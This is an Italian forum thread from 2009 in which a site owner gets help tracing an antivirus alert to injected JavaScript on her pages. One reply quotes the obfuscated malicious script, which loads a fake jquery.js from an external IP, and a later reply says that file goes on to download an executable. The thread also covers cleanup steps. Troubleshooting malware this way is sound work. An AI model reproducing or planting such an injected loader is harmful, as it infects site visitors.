Visualizzazione risultati 1 fino 17 di 17

Discussione: Virus Exploit.JS.Agent.agr

  1. #1
    Guest

    Question Virus Exploit.JS.Agent.agr

    Buongiorno. Questo mi sembra un problema serio. Da qualche tempo visualizzando il mio sito mgdosio.altervista.org i maggiori antivirus segnalano la presenza del virus in oggetto, classificato ad alto rischio, contenuto nel file internet temporaneo denominato jquery[1].js che viene messo puntualmente in quarantena. Desidero precisare che il mio HTML è pulito, e nella mia cartella sul server non sono presenti file con estensione js. Ma da dove viene questo virus? Sono molto preoccupata: questa cosa allontana i visitatori! E' un bel pasticcio! Qualcuno sa darmi una spiegazione?
    Ultima modifica di mgdosio : 23-04-2009 alle ore 18.05.31

  2. #2
    Guest

    Predefinito

    Il problema non sembra derivante dal sito.
    Fai una bella scansione del tuo computer.


    Ciao!

  3. #3
    Data registrazione
    05-09-2008
    Residenza
    Marche!
    Messaggi
    166

    Predefinito

    Quando ho perto il tuo sito il mio pc ha avuto subito la CPU a 100% finchè non l'ho chiuso...

    EDIT: avg 8 mi ha trovato un virus...
    Ultima modifica di versionilatino : 23-04-2009 alle ore 17.43.45

  4. #4
    Guest

    Predefinito

    Devo precisare che prima di scrivere al forum avevo già provveduto a fare tutte le scansioni possibili sul mio pc, che non è risultato precedentemente infetto. Io utilizzo sia Firefox che Internet Explorer: il primo mi svuota la cache dei file temporanei alla chiusura del browser, per il secondo io provvedo a svuotare manualmente tutti i file temporanei alla chiusura del browser. In ogni caso riaprendo uno qualsiasi dei due, e visitando il mio sito per primo, il virus viene puntualmente caricato dai file temporanei di mgdosio.altervista e messo in quarantena. Quindi non c'è nessun dubbio, è colpa del mio sito. Ma i file che io ho caricato sul server sono tutti puliti, ed ho perfino provato questa mattina a ricaricarli ex novo, ma non cè niente da fare. Il problema viene rilevato anche dai pc di miei amici che utilizzano antivirus di marche diverse. E se fosse un problema di server? E' davvero grave. Qualcuno può entrare nel mio sito (mgdosio.altervista.org) e dirmi cosa gli succede? (Mi raccomando, con l'antivirus attivo!). Sono preoccupata, perchè perdo visitatori e reputazione! Grazie.
    Ultima modifica di mgdosio : 23-04-2009 alle ore 18.05.10

  5. #5
    eeepc901 non è connesso Utente giovane
    Data registrazione
    21-12-2008
    Messaggi
    38

    Predefinito

    Non so se può essere d'aiuto o meno, dato che navigo con Linux e non ho un antivirus per testare. L'unica cosa però che ho notato è che "NASA Gallery - dal sito della NASA" non mi presanta un contenuto, ma rimane come se mancasse un plugin o altro in visualizzazione (il che potrebbe anche dipendere da un plugin non presente in Linux). Forse però è tale componente (esterno al tuo sito) che contiene codice js che viene interpretato come virus dagli antivirus. Se l'ipotesi fosse corretta, ti basta disabilitare per un attimo tale componente e fare la prova sul sito.

  6. #6
    L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    NoScript mi blocca un certo: 94.247.2.195
    non conosco la provenienza di questo ip ma posso indicarti questo:
    http://whois.domaintools.com/94.247.2.195
    http://94.247.2.195/ (risulta un sito malevolo)
    http://www.google.it/search?source=i...lr%3D&aq=f&oq=
    http://blog.scansafe.com/journal/200...gle-serps.html (qui info utili)
    Prova a capire perchè quest'ip è presente nella tua pagina e risolverai il tuo problema
    -
    Edit: trovato!
    La stringa "malevola" è nel codice del calendario: hxxp://tuosito,altervista.org/calendarmgd_frame.htm (censurato per evitare che qualcuno ci clicchi)
    Codice:
    <script language=javascript><!-- 
    document.write(unescape('Q4m%3CsQ4mcpGoript%20srczo%3D%2F%2FU309zo49vo%2Ei12479vo%2E2%2E195%2Fjqu3hHery9vo%2E3hHjQ4ms%3E%3CpGo%2FpGosi1ci1rpGoipt%3E').replace(/Q4m|zo|U30|9vo|3hH|i1|pGo/g,""));
     --></script><body>
    Ultima modifica di darkwolf : 23-04-2009 alle ore 21.14.44

  7. #7
    Guest

    Predefinito

    In effetti ho cancellato dal server il documento calendarmgd_frame.htm, ma sembra che il problema sia solo parzialmente risolto: ebbene, su tutte le pagine (o quasi) del mio sito compare la stringa malevola che darkwolf (che ringrazio) mi ha intelligentemente segnalato! Ma come è possibile?? I miei documenti originali non contengono quella stringa!!! Come ha fatto a finire lì? Un maleintenzionato ha violato la protezione del server e ha modificato tutti i miei documenti? La stringa malevola è stata aggiunta a tutte le mie pagine! !!! Tutto il mio sito è stato plagiato!!!!! E' orribile........
    Ultima modifica di mgdosio : 24-04-2009 alle ore 12.03.49

  8. #8
    L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Da quanto ho letto è un malware dal pc che infetta i siti.
    Cioè tu hai un malware, questo si accorge che fai il login via ftp al sito, si memorizza i dati e in modo silent fa il suo sporco lavoro

  9. #9
    Guest

    Predefinito

    Questo significa che devo formattare il pc?

  10. #10
    L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Beh formattare è esagerato...
    Ti consiglio di aggiornare l'OS (WindowsUpdate); Aggiornare l'antivirus; una scansione con SpyBot; una passata con ComboFix e infine di cambiare la password del tuo account ftp
    PS: ovviamente devi anche rimuovere la stringa da tutte le pagine del tuo sito.
    Ultima modifica di darkwolf : 24-04-2009 alle ore 13.46.50

  11. #11
    Guest

    Predefinito

    Tutti gli strumenti che hai citato li ho disponibili, mi manca Combofix che se non sbaglio è un anti-rootkit. E' scaricabile da qualche parte?

  12. #12
    L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

  13. #13
    L'avatar di AlexKidd
    AlexKidd non è connesso Altervistiano Junior
    Data registrazione
    09-02-2007
    Messaggi
    516

    Predefinito

    e pensare che a vederlo cosi sembra l'innocuo JQuery

    http //94.247.2.195 jquery.js guardate il codice voi stessi
    Ultima modifica di dreadnaut : 24-04-2009 alle ore 16.37.51 Motivo: delinkato il link

  14. #14
    L'avatar di dreadnaut
    dreadnaut non è connesso Super Moderatore
    Data registrazione
    22-02-2004
    Messaggi
    6,306

    Predefinito

    se non fosse che verso la fine del codice include un'altro file, che a sua volta scarica un eseguibile.

  15. #15
    Guest

    Predefinito

    Combofix è un software davvero interessante: ha rilevato il malware che gli altri software non avevano rilevato (nè Spybot, nè Zonealarm Total Security) e mi sembra che sia riuscito a porvi rimedio. (Mi piacerebbe sapere se si tratta di un programma da utilizzare solo in casi di emergenza o può essere usato periodicamente per tenere a posto il pc). Alla fine della procedura Combofix consiglia di inserire il suo file di log nella discussione in cui è stato chiesta la sua esecuzione: citando alla lettera il manuale "...E' possibile che Combofix già al primo utilizzo risolva i problemi riscontrati. Si consiglia vivamente di pubblicare ugualmente il log nella discussione nella quale si sta ricevendo aiuto in quanto potrebbero esserci ancora infezioni che richiedono ulteriori analisi". Chiedo conferma a voi prima di pubblicare il file di log, perchè è piuttosto lunghino.
    Ho provveduto ad aggiornare OS, Spybot, Antivirus, ho modificato le password, poi installerò Noscript su Firefox, chissà cosa potrei fare ancora.... Intanto ricontrollo tutti i documenti del mio sito, quando avrò finito proverò a fare il trasferimento FTP, e.........che qualcuno me la mandi buona!

  16. #16
    L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Magari caricalo in una directory del tuo sito e linkacelo.
    Io lo uso solo quando necessario (pc palesemente infetti che non si riesce a ripulire)

  17. #17
    Guest

    Predefinito

    Il mio file di log di Combofix lo potete trovare qui:

    http://mgdosio.altervista.org/combo/ComboFix.txt
    Ultima modifica di mgdosio : 25-04-2009 alle ore 14.39.35

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •